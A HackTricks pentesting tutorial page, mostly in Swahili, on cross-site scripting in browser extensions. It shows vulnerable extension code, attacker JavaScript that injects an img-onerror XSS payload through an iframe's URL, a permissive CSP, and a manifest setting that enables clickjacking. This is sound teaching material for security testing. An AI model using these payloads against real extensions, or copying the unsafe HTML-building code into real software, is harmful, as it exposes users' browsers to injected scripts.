hacktricks/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md

# BrowExt - XSS Mfano

{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}

## Cross-Site Scripting (XSS) kupitia Iframe

Katika mpangilio huu, **script ya maudhui** inatekelezwa kuanzisha Iframe, ikijumuisha URL yenye vigezo vya uchunguzi kama chanzo cha Iframe:
```javascript
chrome.storage.local.get("message", result => {
let constructedURL = chrome.runtime.getURL("message.html") +
"?content=" + encodeURIComponent(result.message) +
"&redirect=https://example.net/details";
frame.src = constructedURL;
});
```
A page ya HTML inayopatikana kwa umma, **`message.html`**, imeundwa kuongeza maudhui kwa njia ya kidinamikia kwenye mwili wa hati kulingana na vigezo vilivyomo kwenye URL:
```javascript
$(document).ready(() => {
let urlParams = new URLSearchParams(window.location.search);
let userContent = urlParams.get("content");
$(document.body).html(`${userContent} <button id='detailBtn'>Details</button>`);
$('#detailBtn').on('click', () => {
let destinationURL = urlParams.get("redirect");
chrome.tabs.create({ url: destinationURL });
});
});
```
A malicious script is executed on an adversary's page, modifying the `content` parameter of the Iframe's source to introduce a **XSS payload**. This is achieved by updating the Iframe's source to include a harmful script:
```javascript
setTimeout(() => {
let targetFrame = document.querySelector("iframe").src;
let baseURL = targetFrame.split('?')[0];
let xssPayload = "<img src='invalid' onerror='alert(\"XSS\")'>";
let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`;

document.querySelector("iframe").src = maliciousURL;
}, 1000);
```
Sera ya Usalama wa Maudhui inayoruhusu kupita kiasi kama:
```json
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"
```
inaruhusu utekelezaji wa JavaScript, na kufanya mfumo kuwa hatarini kwa mashambulizi ya XSS.

Njia mbadala ya kuchochea XSS inahusisha kuunda kipengele cha Iframe na kuweka chanzo chake kujumuisha skripti hatari kama parameta ya `content`:
```javascript
let newFrame = document.createElement("iframe");
newFrame.src = "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" +
encodeURIComponent("<img src='x' onerror='alert(\"XSS\")'>");
document.body.append(newFrame);
```
## DOM-based XSS + ClickJacking

Mfano huu umetolewa kutoka kwenye [post ya awali](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/).

Tatizo kuu linatokana na udhaifu wa Cross-site Scripting (XSS) unaotokana na DOM ulio katika **`/html/bookmarks.html`**. JavaScript inayosababisha shida, sehemu ya **`bookmarks.js`**, imeelezwa hapa chini:
```javascript
$('#btAdd').on('click', function() {
var bookmarkName = $('#txtName').val();
if ($('.custom-button .label').filter(function() {
return $(this).text() === bookmarkName;
}).length) return false;

var bookmarkItem = $('<div class="custom-button">');
bookmarkItem.html('<span class="label">' + bookmarkName + '</span>');
bookmarkItem.append('<button class="remove-btn" title="delete">x</button>');
bookmarkItem.attr('data-title', bookmarkName);
bookmarkItem.data('timestamp', (new Date().getTime()));
$('section.bookmark-container .existing-items').append(bookmarkItem);
persistData();
});
```
Hii snippet inapata **thamani** kutoka kwa **`txtName`** input field na inatumia **mchanganyiko wa nyuzi kuunda HTML**, ambayo kisha inaongezwa kwenye DOM kwa kutumia jQuery’s `.append()` function.

Kwa kawaida, Sera ya Usalama wa Maudhui (CSP) ya nyongeza ya Chrome ingepunguza udhaifu kama huu. Hata hivyo, kutokana na **kuondolewa kwa CSP na ‘unsafe-eval’** na matumizi ya mbinu za usimamizi wa DOM za jQuery (ambazo zinatumia [`globalEval()`](https://api.jquery.com/jquery.globaleval/) kupitisha scripts kwa [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) wakati wa kuingiza DOM), unyakuzi bado unawezekana.

Ingawa udhaifu huu ni muhimu, unyakuzi wake kwa kawaida unategemea mwingiliano wa mtumiaji: kutembelea ukurasa, kuingiza mzigo wa XSS, na kuamsha kitufe cha “Ongeza”.

Ili kuboresha udhaifu huu, udhaifu wa pili wa **clickjacking** unatumika. Manifest ya nyongeza ya Chrome inaonyesha sera pana ya `web_accessible_resources`:
```json
"web_accessible_resources": [
"html/bookmarks.html",
"dist/*",
"assets/*",
"font/*",
[...]
],
```
Kihusishi, ukurasa wa **`/html/bookmarks.html`** unakabiliwa na framing, hivyo ni hatarini kwa **clickjacking**. Uthibitisho huu unatumika kuingiza ukurasa ndani ya tovuti ya mshambuliaji, ukiuweka juu yake na vipengele vya DOM ili kubadilisha muonekano kwa njia ya udanganyifu. Manipulasi hii inawafanya wahanga kuingiliana na nyongeza iliyoko chini bila kukusudia.

## Marejeo

* [https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/](https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/)
* [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}